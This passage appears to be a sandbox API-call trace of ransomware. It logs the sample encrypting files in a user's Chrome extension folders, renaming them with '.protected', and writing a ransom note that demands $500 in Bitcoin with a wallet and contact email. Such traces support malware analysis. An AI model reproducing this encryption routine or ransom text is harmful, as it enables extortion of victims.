(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.212] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.212] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.212] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.212] CloseHandle (hObject=0x164) returned 1 [0080.212] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.212] lstrcmpiW (lpString1="zh_TW", lpString2="Windows") returned 1 [0080.212] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files") returned 1 [0080.212] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files (x86)") returned 1 [0080.212] lstrcmpiW (lpString1="zh_TW", lpString2="$Recycle.bin") returned 1 [0080.212] lstrcmpiW (lpString1="zh_TW", lpString2="System Volume Information") returned 1 [0080.212] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW") returned 144 [0080.213] lstrcmpW (lpString1="zh_TW", lpString2=".") returned 1 [0080.213] lstrcmpW (lpString1="zh_TW", lpString2="..") returned 1 [0080.213] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\*") returned 146 [0080.213] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.213] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.213] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.213] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.213] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.213] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.213] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\.") returned 146 [0080.213] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.213] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.213] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.213] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.213] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.213] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.213] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.213] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\..") returned 147 [0080.213] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.213] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.213] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.213] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.213] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.213] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.213] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.213] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.213] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json") returned 158 [0080.213] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.213] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.213] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.214] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.214] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json") returned 158 [0080.214] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.214] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json") returned 158 [0080.214] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.214] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json") returned 158 [0080.214] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.214] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd4, lpOverlapped=0x0) returned 1 [0080.215] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.215] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd4, lpOverlapped=0x0) returned 1 [0080.215] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.215] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.215] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.215] CloseHandle (hObject=0x168) returned 1 [0080.215] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json.protected") returned 168 [0080.215] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\messages.json.protected")) returned 1 [0080.216] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.216] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.216] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\RESTORE_FILES.txt") returned 162 [0080.216] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.216] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.216] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.217] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.217] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.217] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.217] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.217] CloseHandle (hObject=0x164) returned 1 [0080.217] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0080.217] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0080.217] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\RESTORE_FILES.txt") returned 156 [0080.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0080.217] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.217] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0080.218] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.218] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0080.218] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.218] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0080.218] CloseHandle (hObject=0x160) returned 1 [0080.219] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.219] lstrcmpiW (lpString1="_metadata", lpString2="Windows") returned -1 [0080.219] lstrcmpiW (lpString1="_metadata", lpString2="Program Files") returned -1 [0080.219] lstrcmpiW (lpString1="_metadata", lpString2="Program Files (x86)") returned -1 [0080.219] lstrcmpiW (lpString1="_metadata", lpString2="$Recycle.bin") returned 1 [0080.219] lstrcmpiW (lpString1="_metadata", lpString2="System Volume Information") returned -1 [0080.219] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata") returned 139 [0080.219] lstrcmpW (lpString1="_metadata", lpString2=".") returned 1 [0080.219] lstrcmpW (lpString1="_metadata", lpString2="..") returned 1 [0080.219] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\*") returned 141 [0080.219] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0080.219] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.219] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.219] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.219] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.219] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.219] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\.") returned 141 [0080.219] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.219] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.219] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.219] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.219] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.219] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.219] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.219] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\..") returned 142 [0080.219] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.219] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.219] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.219] lstrcmpiW (lpString1="computed_hashes.json", lpString2="Windows") returned -1 [0080.219] lstrcmpiW (lpString1="computed_hashes.json", lpString2="Program Files") returned -1 [0080.220] lstrcmpiW (lpString1="computed_hashes.json", lpString2="Program Files (x86)") returned -1 [0080.220] lstrcmpiW (lpString1="computed_hashes.json", lpString2="$Recycle.bin") returned 1 [0080.220] lstrcmpiW (lpString1="computed_hashes.json", lpString2="System Volume Information") returned -1 [0080.220] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json") returned 160 [0080.220] StrStrIW (lpFirst="computed_hashes.json", lpSrch=".protected") returned 0x0 [0080.220] lstrcmpW (lpString1="computed_hashes.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.220] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0080.220] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0080.220] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.220] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json") returned 160 [0080.220] StrStrW (lpFirst="computed_hashes.json", lpSrch=".txt") returned 0x0 [0080.220] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json") returned 160 [0080.220] StrStrW (lpFirst="computed_hashes.json", lpSrch=".rar") returned 0x0 [0080.220] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json") returned 160 [0080.220] StrStrW (lpFirst="computed_hashes.json", lpSrch=".zip") returned 0x0 [0080.220] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x160, lpOverlapped=0x0) returned 1 [0080.221] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xfffffea0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.221] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x160, lpOverlapped=0x0) returned 1 [0080.221] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.222] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0080.222] WriteFile (in: 